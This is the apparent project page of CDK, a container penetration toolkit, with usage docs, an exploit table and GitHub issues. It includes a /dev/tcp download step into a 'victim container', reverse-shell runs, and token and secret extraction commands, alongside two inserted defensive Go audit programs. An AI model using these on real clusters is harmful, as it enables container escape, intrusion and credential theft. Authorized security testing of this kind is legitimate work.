CDK - Zero Dependency Container Penetration Toolkit


Legal Disclaimer

Usage of CDK for attacking targets without prior mutual consent is illegal. CDK is for security testing purposes only.

Overview

CDK is an open-source container penetration toolkit, designed to offer stable exploitation in different slimmed-down containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs and helps you escape the container and take over the K8s cluster easily.

Installation/Delivery

Download the latest release from https://github.com/cdk-team/CDK/releases/

Drop the executable into the target container and start testing.

TIPS: Delivering CDK into a target container in real-world penetration testing

If you have an exploit that can upload a file, you can upload the CDK binary directly.

If you have an RCE exploit but the target container has no curl or wget, you can use the following method to deliver CDK:

  1. First, host the CDK binary on your host with a public IP:
     (on your host)
     nc -lvp 999 < cdk
  2. Inside the victim container, execute:
     cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
     chmod a+x cdk

Usage

Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk auto-escape <cmd>
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Auto Escape:
  cdk auto-escape <cmd>                     Escape container in different ways then let target execute <cmd>.

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <data>            Make request to K8s api-server.
  ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
  probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Show this help msg.
  -v --version  Show version.

Features

CDK has three modules:

  1. Evaluate: gather information inside the container to find potential weaknesses.
  2. Exploit: container escaping, persistence and lateral movement.
  3. Tool: network tools and APIs for TCP/HTTP requests, tunnels and K8s cluster management.

Evaluate Module

Usage

cdk evaluate [--full]

This command runs the scripts below without local file scanning; use --full to enable all of them, including the file scan.

| Tactic                | Script                                    |
|-----------------------|-------------------------------------------|
| Information Gathering | OS Basic Info                             |
| Information Gathering | Available Capabilities                    |
| Information Gathering | Available Linux Commands                  |
| Information Gathering | Mounts                                    |
| Information Gathering | Net Namespace                             |
| Information Gathering | Sensitive ENV                             |
| Information Gathering | Sensitive Process                         |
| Information Gathering | Sensitive Local Files                     |
| Information Gathering | Kube-proxy Route Localnet (CVE-2020-8558) |
| Discovery             | K8s Api-server Info                       |
| Discovery             | K8s Service-account Info                  |
| Discovery             | Cloud Provider Metadata API               |
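The Available Capabilities check above reads the CapInh/CapPrm/CapEff/CapBnd/CapAmb hex fields of /proc/self/status (the cdk evaluate output quoted later on this page shows the raw values). The Go program below is an added example, not CDK's own code: it parses a constructed status excerpt, expands the bitmask into capability names and flags the four capabilities that this page's exploit table and PRs tie to container escape, so a reviewer can verify a workload's capability set before it is deployed.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// Linux capability names indexed by bit number (linux/capability.h, bit 0 = CAP_CHOWN).
var capNames = []string{
	"CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER", "CAP_FSETID",
	"CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP", "CAP_LINUX_IMMUTABLE",
	"CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST", "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK",
	"CAP_IPC_OWNER", "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
	"CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE", "CAP_SYS_RESOURCE",
	"CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD", "CAP_LEASE", "CAP_AUDIT_WRITE",
	"CAP_AUDIT_CONTROL", "CAP_SETFCAP", "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG",
	"CAP_WAKE_ALARM", "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF",
	"CAP_CHECKPOINT_RESTORE",
}

// escapeRelevant lists the capabilities this page's exploit table and PRs tie to
// container escape, with the reason a reviewer should not grant them to a workload.
var escapeRelevant = map[string]string{
	"CAP_DAC_READ_SEARCH": "bypasses read permission checks on files the kernel can reach",
	"CAP_SYS_MODULE":      "allows loading kernel modules into the host kernel",
	"CAP_SYS_PTRACE":      "allows attaching to other processes",
	"CAP_SYS_ADMIN":       "allows mount and cgroup administration",
}

// sampleStatus is a constructed /proc/self/status excerpt for a container running
// with Docker's default capability set (0xa80425fb, 14 capabilities).
const sampleStatus = `Name:	sh
Uid:	0	0	0	0
CapInh:	0000000000000000
CapPrm:	00000000a80425fb
CapEff:	00000000a80425fb
CapBnd:	00000000a80425fb
CapAmb:	0000000000000000
`

// ParseStatusCaps extracts the Cap* hex fields of /proc/<pid>/status into a map keyed by field name.
func ParseStatusCaps(status string) (map[string]uint64, error) {
	caps := make(map[string]uint64)
	for _, line := range strings.Split(status, "\n") {
		parts := strings.SplitN(line, ":", 2)
		if len(parts) != 2 || !strings.HasPrefix(parts[0], "Cap") {
			continue
		}
		v, err := strconv.ParseUint(strings.TrimSpace(parts[1]), 16, 64)
		if err != nil {
			return nil, fmt.Errorf("%s: %w", parts[0], err)
		}
		caps[parts[0]] = v
	}
	return caps, nil
}

// DecodeCaps expands a capability bitmask into capability names in bit order;
// bits beyond the known table are kept as CAP_UNKNOWN_<bit> rather than dropped.
func DecodeCaps(mask uint64) []string {
	var names []string
	for bit := 0; bit < 64; bit++ {
		if mask&(uint64(1)<<uint(bit)) == 0 {
			continue
		}
		name := fmt.Sprintf("CAP_UNKNOWN_%d", bit)
		if bit < len(capNames) {
			name = capNames[bit]
		}
		names = append(names, name)
	}
	return names
}

// RiskyCaps returns the escape-relevant capabilities present in a mask, in bit order.
func RiskyCaps(mask uint64) []string {
	var risky []string
	for _, name := range DecodeCaps(mask) {
		if _, ok := escapeRelevant[name]; ok {
			risky = append(risky, name)
		}
	}
	return risky
}

func main() {
	caps, err := ParseStatusCaps(sampleStatus)
	if err != nil {
		panic(err)
	}
	eff := caps["CapEff"]
	fmt.Printf("CapEff 0x%016x = %s\n", eff, strings.Join(DecodeCaps(eff), ","))
	fmt.Printf("escape-relevant in default set: %v\n", RiskyCaps(eff))
	// 0x3fffffffff is the full 38-cap bounding set of a 4.x kernel (the CapBnd line in the host output below).
	for _, name := range RiskyCaps(0x3fffffffff) {
		fmt.Printf("review %s: %s\n", name, escapeRelevant[name])
	}
}
```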

Exploit Module

List all available exploits:

cdk run --list

Run targeted exploit:

cdk run <exploit> [options]

| Tactic               | Technique                                                  | CDK Exploit Name       |
|----------------------|------------------------------------------------------------|------------------------|
| Escaping             | docker-runc CVE-2019-5736                                  | runc-pwn               |
| Escaping             | containerd-shim CVE-2020-15257                             | shim-pwn               |
| Escaping             | docker.sock PoC (DIND attack)                              | docker-sock-check      |
| Escaping             | docker.sock RCE                                            | docker-sock-pwn        |
| Escaping             | Docker API (2375) RCE                                      | docker-api-pwn         |
| Escaping             | Device Mount Escaping                                      | mount-disk             |
| Escaping             | LXCFS Escaping                                             | lxcfs-rw               |
| Escaping             | Cgroups Escaping                                           | mount-cgroup           |
| Escaping             | Procfs Escaping                                            | mount-procfs           |
| Escaping             | Ptrace Escaping PoC                                        | check-ptrace           |
| Escaping             | Rewrite Cgroup (devices.allow)                             | rewrite-cgroup-devices |
| Escaping             | Read arbitrary file from host system (CAP_DAC_READ_SEARCH) | cap-dac-read-search    |
| Discovery            | K8s Component Probe                                        | service-probe          |
| Discovery            | Dump Istio Sidecar Meta                                    | istio-check            |
| Discovery            | Dump K8s Pod Security Policies                             | k8s-psp-dump           |
| Remote Control       | Reverse Shell                                              | reverse-shell          |
| Credential Access    | Registry BruteForce                                        | registry-brute         |
| Credential Access    | Access Key Scanning                                        | ak-leakage             |
| Credential Access    | Dump K8s Secrets                                           | k8s-secret-dump        |
| Credential Access    | Dump K8s Config                                            | k8s-configmap-dump     |
| Privilege Escalation | K8s RBAC Bypass                                            | k8s-get-sa-token       |
| Persistence          | Deploy WebShell                                            | webshell-deploy        |
| Persistence          | Deploy Backdoor Pod                                        | k8s-backdoor-daemonset |
| Persistence          | Deploy Shadow K8s api-server                               | k8s-shadow-apiserver   |
| Persistence          | K8s MITM Attack (CVE-2020-8554)                            | k8s-mitm-clusterip     |
| Persistence          | Deploy K8s CronJob                                         | k8s-cronjob            |

Note about Thin: The thin release is prepared for short-lived container shells such as serverless functions. We add build tags in the source code and cut a few exploits to make the binary lighter. The 2MB file contains 90% of CDK's functions; you can also pick useful exploits from the CDK source code to build your own lightweight binary.
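The docker-sock, mount-cgroup, lxcfs-rw and mount-disk rows of the table above all depend on what has been mounted into the container, which is exactly what the Evaluate module's Mounts script reports. The Go program below is an added example, not CDK's code: it parses /proc/self/mountinfo records (including the variable optional-tag field and the superblock options after the " - " separator) over a constructed sample and reports those mount conditions as hardening findings for the container's owner.

```go
package main

import (
	"fmt"
	"path"
	"strings"
)

// MountInfo is one parsed record of /proc/self/mountinfo (format per proc(5)).
type MountInfo struct {
	ID, Parent, MajorMinor, Root, MountPoint, FSType, Source string
	Options, OptionalTags, SuperOptions                       []string
}

type Finding struct {
	MountPoint string
	Reason     string
}

// sampleMountInfo is a constructed mountinfo excerpt for a container that has a writable
// cgroup subsystem, the Docker socket, a host block device and a writable lxcfs mounted in.
const sampleMountInfo = `1262 1236 0:48 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/AAA,upperdir=/var/lib/docker/overlay2/x/diff,workdir=/var/lib/docker/overlay2/x/work
1270 1262 0:27 / /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - tmpfs tmpfs ro,mode=755
1275 1270 0:33 /docker/3cd1 /sys/fs/cgroup/devices rw,nosuid,nodev,noexec,relatime master:12 - cgroup cgroup rw,devices
1290 1262 0:23 /docker.sock /run/docker.sock rw,nosuid,noexec,relatime shared:5 - tmpfs tmpfs rw,size=402968k,mode=755
1291 1262 8:1 / /host rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro,data=ordered
1292 1262 0:60 / /data/monitor/lxcfs rw,nosuid,nodev,relatime - fuse.lxcfs lxcfs rw,user_id=0,group_id=0,allow_other
`

// unescape decodes the octal escapes the kernel uses for whitespace and backslashes in paths.
func unescape(s string) string {
	return strings.NewReplacer(`\040`, " ", `\011`, "\t", `\012`, "\n", `\134`, `\`).Replace(s)
}

// ParseMountInfoLine splits one record at " - ", the only reliable way to find the tail behind the optional tags.
func ParseMountInfoLine(line string) (MountInfo, error) {
	var m MountInfo
	sep := strings.Index(line, " - ")
	if sep < 0 {
		return m, fmt.Errorf("no ' - ' separator in %q", line)
	}
	head, tail := strings.Fields(line[:sep]), strings.Fields(line[sep+3:])
	if len(head) < 6 || len(tail) < 3 {
		return m, fmt.Errorf("short mountinfo record %q", line)
	}
	m.ID, m.Parent, m.MajorMinor = head[0], head[1], head[2]
	m.Root, m.MountPoint = unescape(head[3]), unescape(head[4])
	m.Options, m.OptionalTags = strings.Split(head[5], ","), head[6:]
	m.FSType, m.Source = tail[0], unescape(tail[1])
	m.SuperOptions = strings.Split(tail[2], ",")
	return m, nil
}

// ParseMountInfo parses a whole mountinfo file, one record per line.
func ParseMountInfo(text string) ([]MountInfo, error) {
	var mounts []MountInfo
	for _, line := range strings.Split(strings.TrimSpace(text), "\n") {
		m, err := ParseMountInfoLine(line)
		if err != nil {
			return nil, err
		}
		mounts = append(mounts, m)
	}
	return mounts, nil
}

// AuditMounts flags the mount conditions behind the docker-sock, mount-cgroup,
// lxcfs-rw and mount-disk rows of the exploit table; each one is a hardening finding.
func AuditMounts(mounts []MountInfo) []Finding {
	var findings []Finding
	for _, m := range mounts {
		rw := m.Options[0] == "rw" // the per-mount option list always starts with rw or ro
		var why string
		switch {
		case path.Base(m.MountPoint) == "docker.sock":
			why = "Docker daemon socket is reachable from inside the container"
		case m.FSType == "cgroup" && rw:
			why = "writable cgroup v1 subsystem mount (" + strings.Join(m.SuperOptions, ",") + ")"
		case m.FSType == "fuse.lxcfs" && rw:
			why = "writable lxcfs mount"
		case strings.HasPrefix(m.Source, "/dev/") && m.FSType != "devtmpfs":
			why = "host block device " + m.Source + " mounted at root " + m.Root
		default:
			continue
		}
		findings = append(findings, Finding{m.MountPoint, why})
	}
	return findings
}

func main() {
	mounts, err := ParseMountInfo(sampleMountInfo)
	if err != nil {
		panic(err)
	}
	for _, f := range AuditMounts(mounts) {
		fmt.Printf("%-24s %s\n", f.MountPoint, f.Reason)
	}
}
```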

Tool Module

These run like the equivalent Linux commands, with small differences in the input arguments; see the usage docs.

cdk nc [options]
cdk ps
| Command  | Description                    |
|----------|--------------------------------|
| nc       | TCP Tunnel                     |
| ps       | Process Information            |
| ifconfig | Network Information            |
| vi       | Edit Files                     |
| kcurl    | Request to K8s api-server      |
| dcurl    | Request to Docker HTTP API     |
| ucurl    | Request to Docker Unix Socket  |
| rcurl    | Request to Docker Registry API |
| probe    | IP/Port Scanning               |

Release Document

If you want to know how we release a new version, how the thin build is produced, why we provide upx versions, what the differences between the all, normal, thin and upx versions are, and how to choose specific CDK exploits and tools to compile your own release, please check the Release Document.

Developer Docs

Contributing to CDK

First off, thanks for taking the time to contribute!

By reporting issues, ideas or PRs, your GitHub ID will be listed here.

Bug Reporting

Bugs are tracked as GitHub Issues. Create an issue with the current CDK version, the error message and the environment, and describe the exact steps that reproduce the problem.

Suggesting Enhancements

Enhancement suggestions are tracked as GitHub Discussions. You can publish any thoughts there to discuss with the developers directly.

Pull Requests

Fix problems or maintain CDK's quality:

  • Describe the current CDK version, environment, problem and the exact steps that reproduce the problem.
  • Provide screenshots or logs from before and after you fix the problem.

New features or exploits:

  • Explain why this enhancement would be useful to other users.
  • Please provide a sustainable environment in which we can review your contribution.
  • Provide screenshots of how the new feature works.
  • If you are committing a new evaluate/exploit script, please add a simple doc to your PR message; here is an example.

Events

404StarLink 2.0 - Galaxy


Project CDK is now included in the 404Team StarLink Project 2.0. Join the StarLink community to get in touch with the CDK dev team.

BlackHat Asia 2021 Arsenal

HITB SecConf 2021 Amsterdam

WHC 2021 (补天白帽大会)

KCON 2021 Arsenal

Kubernetes community Days 2021

Comments
  • feat(exploit/abuse_unpriv_userns.go): exploit of CVE-2022-0492

    co-operate with PR #40.

    Use the reexec technique to let a multi-threaded program (such as this golang program) run in a different new namespace.

    Why reexec?

    unshare() cannot be used safely in a multi-threaded program, especially under the current circumstances. Check the comments in the code for more details.

    Signed-off-by: kmahyyg [email protected]

    opened by kmahyyg 13
  • Add CAP_DAC_READ_SEARCH escape

    Hi team! First of all thanks for the project! I'd like to contribute escape via CAP_DAC_READ_SEARCH capability that allows arbitrary file read.

    You'll find documentation to this escape in comments to this PR because I can't edit project Wiki directly.


    Nikita Stupin Advanced Software Technology Lab Huawei

    opened by nikitastupin 6
  • Two problems with docker_runc.go in the exploit module

    1. After running ./cdk run runc-pwn "", matching "runc" among the processes also matches the process running this very command, so the self process is always matched first. I suggest changing the command, e.g. ./cdk run rc-pwn

    2. After reading the pids under /proc, the code in the screenshot below iterates over the pids only once and then exits. It should keep listening until the host runs docker exec again, at which point runc can be found. I suggest adding an outer for loop.
    opened by lqqqc 3
  • Problem reproducing CVE-2020-14257

    Problem reproducing CVE-2020-15257

    I want to reproduce CDK's exploitation of CVE-2020-15257. My docker version is:

    $docker version
    Client:
     Version:      18.03.1-ce
     API version:  1.37
     Go version:   go1.9.5
     Git commit:   9ee9f40
     Built:        Thu Apr 26 07:17:20 2018
     OS/Arch:      linux/amd64
     Experimental: false
     Orchestrator: swarm
    
    Server:
     Engine:
      Version:      18.03.1-ce
      API version:  1.37 (minimum version 1.12)
      Go version:   go1.9.5
      Git commit:   9ee9f40
      Built:        Thu Apr 26 07:15:30 2018
      OS/Arch:      linux/amd64
      Experimental: false
    

    The API version is 1.3.7, which is a vulnerable version.

    Run the following commands:

    docker run -itd --name 14257 --net=host ubuntu /bin/bash
    docker cp cdk_linux_amd64 15257:/tmp
    

    Then inside the container:

    ./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx 1234
    

    Now I want to get a reverse shell of the host back to my attack machine, but the program reports an error; the details are as follows:

    [email protected]:/tmp# ./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx 1234
    2021/06/25 03:01:57 tring to spawn shell to xx.xx.xx.xx:1234
    2021/06/25 03:01:57 try socket: @/containerd-shim/moby/984f085a7c09eac06c5f0dd7318168b50c3438351544de4f6f9a7c1e0f1ef997/shim.sock
    2021/06/25 03:01:57 rpc error response.:
    rpc error: code = Unknown desc = OCI runtime create failed: exec: "runc": executable file not found in $PATH
    2021/06/25 03:01:57 exploit failed.
    

    It looks like runc was not found under the $PATH directories. I installed docker via the method provided on the official site, did not install runc separately, and did not switch the container's underlying runtime. The container runs normally, which means runc must be on the system, but the exploit failed.

    Additional information

    1. What is the output of cdk evaluate --full? [executed on the host]

    $ ./cdk_linux_amd64 evaluate --full
    
    [Information Gathering - System Info]
    2021/06/24 19:45:23 current dir: /home/xsw/Desktop
    2021/06/24 19:45:23 current user: xsw uid: 1000 gid: 1000 home: /home/xsw
    2021/06/24 19:45:23 hostname: ubuntu
    2021/06/24 19:45:23 debian ubuntu 16.04 kernel: 4.8.0-34-generic
    
    [Information Gathering - Services]
    2021/06/24 19:45:23 sensitive env found:
    	SSH_AUTH_SOCK=/run/user/1000/keyring/ssh
    2021/06/24 19:45:23 service found in process:
    	1873	1814	ibus-engine-sim
    2021/06/24 19:45:23 service found in process:
    	8638	1	dockerd
    2021/06/24 19:45:23 service found in process:
    	8644	8638	docker-containe
    2021/06/24 19:45:23 service found in process:
    	9976	8644	docker-containe
    2021/06/24 19:45:23 service found in process:
    	10501	10470	docker
    2021/06/24 19:45:23 service found in process:
    	12100	11244	docker
    2021/06/24 19:45:23 service found in process:
    	12106	8644	docker-containe
    
    [Information Gathering - Commands and Capabilities]
    2021/06/24 19:45:23 available commands:
    	curl,wget,nc,netcat,docker,find,ps,python,python3,apt,dpkg,ssh,git,vi,capsh,mount,fdisk,gcc,g++,make,base64,python2,python2.7,perl,xterm,sudo
    2021/06/24 19:45:23 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
    	CapInh:	0000000000000000
    	CapPrm:	0000000000000000
    	CapEff:	0000000000000000
    	CapBnd:	0000003fffffffff
    	CapAmb:	0000000000000000
    	Cap decode: 0x0000000000000000 = 
    [*] Maybe you can exploit the Capabilities below:
    
    [Information Gathering - Mounts]
    Device:/dev/sda1 Path:/ Filesystem:ext4 Flags:rw,relatime,errors=remount-ro,data=ordered
    
    [Information Gathering - Net Namespace]
    	host unix-socket found, seems container started with --net=host privilege.
    	found containerd-shim socket in: [@/containerd-shim/moby/7ec0aae020d2b66617d2fc95419ec3928d9c91b111ae639bdddfb24b99bfb98a/shim.sock]
    	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]
    	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]
    	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]
    	found containerd-shim socket in: [@/containerd-shim/moby/7ec0aae020d2b66617d2fc95419ec3928d9c91b111ae639bdddfb24b99bfb98a/shim.sock]
    	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]
    	found containerd-shim socket in: [@/containerd-shim/moby/7ec0aae020d2b66617d2fc95419ec3928d9c91b111ae639bdddfb24b99bfb98a/shim.sock]
    	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]
    
    [Information Gathering - Sysctl Variables]
    2021/06/24 19:45:23 net.ipv4.conf.all.route_localnet = 0
    
    [Discovery - K8s API Server]
    2021/06/24 19:45:23 checking if api-server allows system:anonymous request.
    err found while searching local K8s apiserver addr.:
    err: cannot find kubernetes api host in ENV
    	api-server forbids anonymous request.
    	response:
    
    [Discovery - K8s Service Account]
    load K8s service account token error.:
    open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory
    
    [Discovery - Cloud Provider Metadata API]
    2021/06/24 19:45:24 failed to dial Alibaba Cloud API.
    2021/06/24 19:45:25 failed to dial Azure API.
    2021/06/24 19:45:25 failed to dial Google Cloud API.
    2021/06/24 19:45:26 failed to dial Tencent Cloud API.
    2021/06/24 19:45:27 failed to dial OpenStack API.
    2021/06/24 19:45:27 failed to dial Amazon Web Services (AWS) API.
    2021/06/24 19:45:28 failed to dial ucloud API.
    
    [Information Gathering - Sensitive Files]
    	/.bashrc - /etc/skel/.bashrc
    	/docker.sock - /etc/systemd/system/sockets.target.wants/docker.socket
    	/.bash_history - /home/xsw/.bash_history
    	/.bashrc - /home/xsw/.bashrc
    	.git/ - /home/xsw/metarget/.git/HEAD
    	.git/ - /home/xsw/metarget/.git/branches
    	.git/ - /home/xsw/metarget/.git/config
    	.git/ - /home/xsw/metarget/.git/description
    	.git/ - /home/xsw/metarget/.git/hooks
    	.git/ - /home/xsw/metarget/.git/index
    	.git/ - /home/xsw/metarget/.git/info
    	.git/ - /home/xsw/metarget/.git/logs
    	.git/ - /home/xsw/metarget/.git/objects
    	.git/ - /home/xsw/metarget/.git/packed-refs
    	.git/ - /home/xsw/metarget/.git/refs
    	/docker.sock - /lib/systemd/system/docker.socket
    	/docker.sock - /run/docker.sock
    	/docker.sock - /var/lib/systemd/deb-systemd-helper-enabled/docker.socket.dsh-also
    	/docker.sock - /var/lib/systemd/deb-systemd-helper-enabled/sockets.target.wants/docker.socket
    
    [Information Gathering - ASLR]
    2021/06/24 19:45:49 /proc/sys/kernel/randomize_va_space file content: 2
    2021/06/24 19:45:49 ASLR is enabled.
    
    [Information Gathering - Cgroups]
    2021/06/24 19:45:49 /proc/1/cgroup file content:
    	11:pids:/init.scope
    	10:cpuset:/
    	9:hugetlb:/
    	8:memory:/init.scope
    	7:devices:/init.scope
    	6:freezer:/
    	5:cpu,cpuacct:/init.scope
    	4:perf_event:/
    	3:net_cls,net_prio:/
    	2:blkio:/init.scope
    	1:name=systemd:/init.scope
    

    2. Full error message

    [email protected]:/tmp# ./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx 1234
    2021/06/25 03:01:57 tring to spawn shell to xx.xx.xx.xx:1234
    2021/06/25 03:01:57 try socket: @/containerd-shim/moby/984f085a7c09eac06c5f0dd7318168b50c3438351544de4f6f9a7c1e0f1ef997/shim.sock
    2021/06/25 03:01:57 rpc error response.:
    rpc error: code = Unknown desc = OCI runtime create failed: exec: "runc": executable file not found in $PATH
    2021/06/25 03:01:57 exploit failed.
    
    question 
    opened by duowen1 3
  • add kubelet exec

    Exploit: kubelet-exec

    Use the default '10250' port 'kubelet' service to list pods running in the cluster.
    By default, unauthorized access is supported. The token can be entered optionally.

    Uses the kubelet service on the default port 10250 to list the pods running in the cluster, and supports executing system commands in a specified pod and echoing the output.
    Unauthenticated access is exploited by default; a token can optionally be supplied.

    Usage

    ./cdk run kubelet-exec (list|exec) <endpoint>/<namespace>/<pod>/<container> <token>
    

    Example

    ./cdk run kubelet-exec list http://172.16.61.10:10250
    ./cdk run kubelet-exec exec https://172.16.61.10:10250/kube-system/test1/test "ip addr"
    
    opened by 404tk 2
  • Implement mount-cgroup in Golang style

    feat(exp/mount_cgroup.go): completely fix #35 in golang-style

    This implemented mount-cgroup exploit totally in Golang.

    Detailed information:

    • Change whole "create-mount-write" process using Golang native Unix API.
    • To avoid conflict, increase length of random string from 3 to 4. Tasks sub-cgroup are also in the same kind of random name.
    • Read mounted filesystem information from /proc/self/mountinfo, instead of /etc/mtab .
    • Due to the limitation of exec.Command, output redirect is implemented in another way: manually get pid and write to cgroups.procs

    Further enhancement:

    • To read the container filesystem path on the host, implement to read superBlockOptions of MountInfo.
    • To implement CVE-2022-0492 in this PR further, I modified EscapeCgroup function, so that it can be re-used for other subsystems.

    Chores:

    • go mod tidy
    • Fix Typo
    • Run a much quicker random string generator
    1b94046 (HEAD -> main, origin/main, origin/HEAD) feat(exp/mount_cgroup.go): completely fix #35 in golang-style
    043d6b6 feat(util/cgroup.go): add superBlockOptions when parsing /proc/self/mountinfo
    4c640ae fix(util/cgroup.go): typo: marjor -> major
    60b44e5 fix(exp/mount-cgroup): fix #35 in shell-style in a simple way
    ecfadba optimize(exp/mount-cgroup): update build constraint, cgroup is linux only
    ef056df optimize(util/common.go): Quicker Random String Generator
    
    opened by kmahyyg 2
  • Add check for `CAP_SYS_MODULE` and `CAP_DAC_READ_SEARCH`

    Hi team,

    1. In this PR I've added an explicit check for CAP_SYS_MODULE (and CAP_DAC_READ_SEARCH as well) at the evaluate step. This way it's more clear for the end user what escape techniques he / she can apply after the evaluate step is completed.
    2. I suggest refactoring check_ptrace.go in a similar way because technically it's just evaluating that CAP_SYS_PTRACE exists and not actually escaping. So I suppose it should belong to the evaluate step rather than the escape step.
    3. The reason why I didn't implement an actual CAP_SYS_MODULE escape in CDK is because each kernel version and architecture combination requires a kernel module built specifically for it. Given how many kernel versions and architectures are out there, I see several options:
      1. To write detailed instructions on how to build a kernel module for an arbitrary kernel version and architecture and put them in CDK.
      2. To prebuild kernel modules for the most popular distributions (e.g. Ubuntu 20.04), include them in the CDK binary and leave a note on how to build a kernel module for other kernel versions.
    4. What do you think about point (3)? Do you have any ideas on how to integrate CAP_SYS_MODULE escape to CDK?

    Nikita Stupin Advanced Software Technology Lab Huawei

    opened by nikitastupin 2
  • add lxcfs-rw escape

    Adds exploitation for the case where lxcfs is writable inside the container.

    output:

    /tmp # ./cdk run lxcfs-rw
    2021/01/27 16:30:17 found pod devices.allow path: /kubepods/burstable/pod3453dde3-3ede-11eb-bff3-5254005e6516/8ca73287248fc9f72f6d502db9406edeca5acacd85b466b68d7ad4810e3bf7e5
    2021/01/27 16:30:17 found rw lxcfs mountpoint: /data/monitor/lxcfs
    2021/01/27 16:30:17 found host blockDeviceId Marjor: 253 Minor: 1
    2021/01/27 16:30:17 set all block device accessible success.
    2021/01/27 16:30:17 devices.allow content: a *:* rwm
    2021/01/27 16:30:17 exploit success, run "debugfs -w host_dev".
    

    Exploit result: (screenshot)

    opened by yeahx 2
  • shim-pwn fails to execute

    I tried shim-pwn; running the shim-pwn exp inside the container gave the following error:

    debianxxx(@:):~# ./cdk_linux_amd64 run shim-pwn 10.1.1.1 12346
    2020/12/30 17:36:09 tring to spawn shell to 10.1.1.1:12346
    2020/12/30 17:36:09 try socket: @/containerd-shim/moby/fc3385bd1b56983d7a5fc2997560cc445180cd1130150692171563eed09d8c3d/shim.sock
    2020/12/30 17:36:09 rpc error: rpc error: code = Unknown desc = OCI runtime create failed: JSON specification file config.json not found
    2020/12/30 17:36:09 try socket: @/containerd-shim/moby/b029461e5e5f7dbca3b6fd89414ac06946d5fb73456000edcc2f9fcc6ef9164c/shim.sock
    2020/12/30 17:36:09 rpc error: rpc error: code = Unknown desc = OCI runtime create failed: JSON specification file config.json not found
    2020/12/30 17:36:09 try socket: @/containerd-shim/moby/7a77f96e2061f6d5160167400ae59b20d08229a626ff1ef5bdd9e7458e95741f/shim.sock
    2020/12/30 17:36:09 rpc error: rpc error: code = Unknown desc = OCI runtime create failed: JSON specification file config.json not found
    

    Docker version:

    Client:
     Version:           18.06.1-ce
     API version:       1.38
     Go version:        go1.10.3
     Git commit:        e68fc7a
     Built:             Tue Aug 21 17:23:18 2018
     OS/Arch:           linux/amd64
     Experimental:      false
    
    Server:
     Engine:
      Version:          18.06.1-ce
      API version:      1.38 (minimum version 1.12)
      Go version:       go1.10.3
      Git commit:       e68fc7a
      Built:            Tue Aug 21 17:22:21 2018
      OS/Arch:          linux/amd64
      Experimental:     false
    
    opened by forkingna 2
  • add etcd get k8s token

    Exploit: etcd-get-k8s-token

    List key and value pairs under the /registry/secrets/kube-system/ in etcd service, regular extract plaintext service-account-token, requests the default port 6443 'K8s API-server' service to verify the validity of the token and take over the cluster.

    Iterates over the key/value pairs under the /registry/secrets/kube-system/ prefix in etcd, extracts plaintext service-account-tokens with a regular expression, makes requests to the K8s api-server service on the default port 6443 to verify the tokens' validity, and can go on to take over the cluster.

    Usage

    ./cdk run etcd-get-k8s-token (anonymous|default) <endpoint> <cert> <cert_key> <ca>
    

    Example

    ./cdk run etcd-get-k8s-token anonymous http://172.16.61.10:2379
    ./cdk run etcd-get-k8s-token default
    
    opened by 404tk 1
  • Two problems in Exploit-docker_runc.go

    1. Line 48 of the code checks whether it is a directory; if !util.IsDir(f.Name()) should be changed to if !util.IsDir("/proc/" + f.Name()) (screenshot)

    2. Line 93 of the code: Desc() is wrong (screenshot (1)). It should be ./cdk run runc-pwn <shell-cmd>; several other modules have the same problem.

    opened by lqqqc 1
  • Could CVE-2021-22555 be added to CDK?

    opened by OFalwl 1
  • [Exploit] Implement actual CAP_SYS_MODULE escape in CDK

    From: @nikitastupin in #20

    The reason why I didn't implement actual CAP_SYS_MODULE escape in CDK is because each kernel version and architecture combination requires kernel module built specifically for it. Given how many kernel versions and architectures out there I see several options:

    • To make detailed instructions on how to build kernel module for arbitrary kernel version and architecture and put them to CDK.
